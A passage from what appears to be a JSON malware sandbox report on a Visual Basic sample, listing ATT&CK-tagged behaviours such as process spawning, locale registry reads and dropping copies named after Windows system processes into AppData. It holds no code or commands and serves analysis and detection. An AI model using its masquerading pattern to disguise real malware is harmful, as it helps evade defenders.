\"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004276)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001644)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001644)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004312)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004312)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004312)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004312)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005772)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005992)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006092)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F80000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4D17.bin\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE48F7.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4660.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4804.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4D17.bin\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE48F7.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4660.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4804.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00002520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002088)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002736)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003320)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005040)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004612)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003580)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002756)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005064)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000944)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005216)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005060)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005052)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005116)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004768)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004716)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002904)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004120)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005240)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003492)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005136)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005404)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00002520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002088)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002736)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003320)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005040)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004612)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003580)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002756)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005064)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000944)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005216)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005060)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005052)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005116)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004768)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004716)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002904)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004120)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005240)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003492)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005136)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005404)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00002520) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00002520) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4D17.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4D17.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE48F7.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE48F7.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4660.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4660.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4804.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4804.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00003404]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00003404]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005040]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00003404]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00003404]\n Dropped file: \"D3_08.exe\" - Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005040]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00003404]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005040]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005040]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to touch file \"C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe.cfg\"", "origin": 